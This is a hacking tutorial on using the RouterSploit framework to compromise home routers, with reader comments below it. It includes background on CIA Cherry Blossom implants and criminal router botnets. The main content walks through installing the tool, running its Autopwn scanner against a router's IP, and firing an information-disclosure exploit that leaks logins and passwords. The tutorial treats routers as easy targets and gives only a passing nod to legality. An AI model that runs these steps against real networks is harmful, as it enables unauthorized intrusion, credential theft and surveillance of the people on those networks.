How To: Seize Control of a Router with RouterSploit

Seize Control of a Router with RouterSploit

A router is the core of anyone's internet experience, but sadly most people don't spend much time setting up this critical piece of hardware. Old firmware, default passwords, and other configuration issues continue to haunt many organizations. Exploiting the poor, neglected computer inside these routers has become so popular and easy that automated tools have been created to make the process a breeze.

In this hacking tutorial, we'll learn how to use RouterSploit, a tool for automating the process of router exploitation. But before we dive right in, let's get a little background information on the tools available and why router exploitation is so big.

The Basics Behind Router Exploitation

Router exploitation works by breaching the Wi-Fi security of a router, bypassing the administrative login page, and accessing administrative features. A skilled attacker can then target the existing firmware that runs the router in a practice called "rootkitting" in which a custom firmware is dropped into the router to enable advanced malicious features.

Depending on the goals and resources of an attacker, this can include spying on the user and any connected devices, injecting malware into the browser to exploit connected devices, enabling advanced spear phishing attacks, and routing illegal traffic for criminal activities through exploited routers.

Government Router Hacking with Cherry Blossom

Government agencies like the NSA and CIA hoard exploits for routers, and the ShadowBrokers have threatened to release these exploits on the heels of the Windows SMB leaks that spawned WanaCry (or WannaCry). If they follow through with the threats to leak router exploits in June, tools like Cherry Blossom could become mainstream.

These tools from the NSA and CIA control entire networks of infected routers, transforming them into advanced, on-site wireless espionage devices. Why plant a fancy spying device when you can just turn a home router into one?

Cherry Blossom is a rootkitting master framework, in which routers are automatically exploited and converted into "flytraps." A flytrap is a router that has been compromised and updated with special firmware that prevents the user from updating or modifying the new firmware.

Cherry Blossom can control many "flytraps," providing instant access to advance spying devices located in the home or work of a target. Image via Cherry Blossom Quick Start Guide / WikiLeaks / CIA

The flytrap establishes a "beacon" back to a command-and-control server called "Cherryweb," and is then assigned "missions" by an operator via an encrypted VPN tunnel. Advanced modules, like "Windex," which performs a drive-by malware injection attack against any connected target, can turn a flytrap into an advanced remote espionage platform capable of being controlled from anywhere.

Cherry Blossom displaying mission commands to be sent to flytrap devices, including shell code, recon scripts, and exploits. Some poor guy is going to get his Cherry Blossomed. Image via Cherry Blossom Quickstart Guide / WikiLeaks / CIA

Criminal IoT & Router Hacking

Aside from the espionage application the CIA focuses on, exploitable routers and IoT devices are commonly targeted because of their routing ability. RouterSploit, the tool we're working with today, doesn't just compromise routers, it can also go after webcams and other connected devices.

While the CIA uses VPN connections to hide traffic to and from command-and-control servers, cyber criminals will use these devices to proxy malicious traffic to avoid detection. In fact, networks of these infected routers and IoT devices are sold as black market proxies for hiding illegal activity like credit card theft, darknet transactions, and DDoS attacks. By failing to secure your router, you could be signing up to relay traffic for criminal hacking enterprises.

Most people set up routers and forget about them, failing to change the default setting, update the firmware, or otherwise protect them. Image by nito500/123RF

Beginner Router Hacking

While simply trying the default password is the first step towards router exploitation, more advanced frameworks exist even for beginners. Why would a beginner want to exploit a router? On a local level, if you fully compromise the router, you will have complete access to the network. This allows you to control and route the target's internet experience to wherever or whatever you want or forward ports for remote access.

You should consider a router as an early and productive target to take on during the stages of an engagement. Even if you're a beginner, simply running the Autopwn scanner on RouterSploit will automatically test a range of vulnerabilities against a target IP address, reducing the process of finding a potential exploit to a matter of seconds.

What Is RouterSploit?

RouterSploit is a handy Python program which automates most of the tasks associated with compromising a router. Modeled after Metasploit, its commands will be familiar to anyone used to the Metasploit framework. It contains scanning and exploit modules and is available for Kali Linux (and macOS or Mac OS X if you want).

Once you associate to a target network, running a scan will reveal whether a router can be easily exploited through the framework. Today, we will be going over the Autopwn feature to quickly identify vulnerabilities on routers and connected devices.

The RouterSploit exploit framework landing page, with options for Autopwn present.

Getting It Running — What You'll Need

RouterSploit is great because it runs on Kali Linux, our Kali Raspberry Pi, macOS or Mac OS X, Windows, and even on an unrooted Android phone. To start, we'll need to take care of some dependencies and ensure Python is installed. Aside from that, compromising a router has never been easier from any device you have handy.

Step 1: Installing Dependencies

To proceed, we'll need to ensure we have Python installed. You'll need the following packages:

  • Gnureadline (macOS / Mac OS X only)
  • Requests
  • Paramiko
  • Beautifulsoup4
  • Pysnmp

You can install them all by typing:

apt-get install requests paramiko beautifulsoup4 pysnmp

Step 2: Installing on OS X, Kali Linux & Others

To install on Kali Linux, open a terminal window and type:

git clone https://github.com/reverse-shell/routersploit
cd routersploit
./rsf.py

On macOS or Mac OS X, the method is similar. In a terminal window, type:

git clone https://github.com/reverse-shell/routersploit
cd routersploit
sudo easy_install pip
sudo pip install -r requirements.txt

Step 3: Running RouterSploit

For our first run, connect your computer to a network with a router you'd like to scan. Navigate to the RouterSploit folder and run RouterSploit by typing:

cd
cd routersploit
sudo python ./rsf.py

The RouterSploit framework bears a striking similarity to the Metasploit framework, both in interface style and workflow. A command-line interface lets you input simple commands to scan and exploit routers, and you can see everything RouterSploit has to offer by typing:

show all

Lots of exploits, default creds, and scanners! How fun. To begin, we'll start with a scan against a target router, which will check to see if each and every vulnerability might work against it. It will return a list at the end of the scan with every exploit that will work against the target — no research required.

Step 4: Scanning a Target

We will be using Autopwn scanner to find any vulnerabilities that apply to our target. Locate the IP address of the router, and save it, because we'll need it to input it shortly. Most of the time, the router is at 192.168. 0.1, but this can change. You can use Fing or ARP-scan to find the IP address if you don't know it.

After starting RouterSploit, enter the Autopwn module by typing:

use scanners/autopwn
show options

This is very similar to Metasploit. To get around, type use and then whatever module you want to use, show options to show the variables of that module you've selected, set to set any of the variables you see from the show options command, and finally, run to execute the module. Pretty simple. To close out of the module and take you to the main screen, type exit.

In this case, we will set the target to the IP address of the router. Type set target and then the IP address of the router, then press enter. Finally, type run to begin the scan.

Step 5: Selecting & Configuring the Exploit

After the scan is complete, we'll be left with a list of vulnerabilities it finds. We can pick from this list to decide which exploit best suits our needs.

Here, we see a router with many vulnerabilities. Let's start with a simple exploit, some revealing information disclosure.

To use this exploit, we'll enter the following:

use exploits/routers/3com/3cradsl72infodisclosure
show options

A list of the variables will come up, and you'll be able to set your target by typing:

set target <target router IP>
check

This will set the target and confirm it is vulnerable.

Step 6: Running the Exploit

The target looks good and vulnerable. To fire the payload, type run.

If the exploit is successful, you should be greeted with internal configuration settings that can leak the login and password of users, default passwords, and device serial number, among other settings that allow you to compromise the router. Other modules allow you to remotely inject code or directly disclose the router password. Which you can run depends on what the target router is vulnerable to.

Warnings

This intro should get you familiar with running RouterSploit to compromise a router, now you can start using other modules and experimenting with different kinds of exploits. Although Autopwn is a convenient feature, it tries a lot of different exploits and thus is very noisy on the network. The preferred option is to scan your target, do some recon, and only run the relevant modules for the manufacturer of the target router. While exploiting routers might be trendy, keep in mind doing so on someone else's router without permission is a crime. Unless you're the CIA.

You can ask me questions here or @sadmin2001 on Twitter or Instagram.

Cover photo and screenshots by SADMIN/Null Byte

15 Comments

Great tutorial.
Happy to see that the community is still alive.
XD

Thank you!

Maybe I m stupid to ask this question,
But do i hav to log in and connect to the target wifi so to exploit it??
Thanks

Hey! Yes, you must be connected to the wifi

at ./rsf.py i get the message: "ImportError: No module named requests"
any fixes?

Run: sudo apt-get install python-pip and: sudo pip install requests

Hey SADMIN :)

Just made an account after touring the site for months, you guys helped a fresh HS Grad find his passion and future career path, I thank you greatly! Now onto my question(for anyone to answer really).

In the event that a router has been compromised via Routersploit, would the person in control hypothetically be able to access computers connected to it without any user input. For instance, if someone were to break into my router while I was at school, could they break into my IP security cameras, or other web-cams/ or even computers (without any interaction from me) and then be able to watch me walk in the front door? I may be misguided but It seems like so long as I personally do not download anything malicious or go to any suspicious websites I should be in the clear?

Hey!

To use routersploit, you must have already broken the Wi-Fi password. Once you have the Wi-Fi password, any device connected to the network can be scanned if it is not isolated to its own subnet. You can attempt to crack the password of any device you see on the network. Owning the router definitely makes the situation worse, but it isn't necessary for doing what you suggest.

Thank you for the response :)

Hey,
You said it can run on an unrooted Android. How do I do that ??
Can you please help me out.
:)

Yep! I'm releasing a tutorial this week

I mean now

what does it mean if instead of saying device is vulnurable or not it says it could not be verified

It means it was not able to confirm or deny the vulnerability, which isn't great. You can try it, but it probably won't work

Hi guys..after getting a vulnerability
Exploits/router/huawei/hg520 info_disclosure..
After using tht exploit an error saying module hg520 not found appears ..plz help sadmin

Share Your Thoughts

  • Hot
  • Latest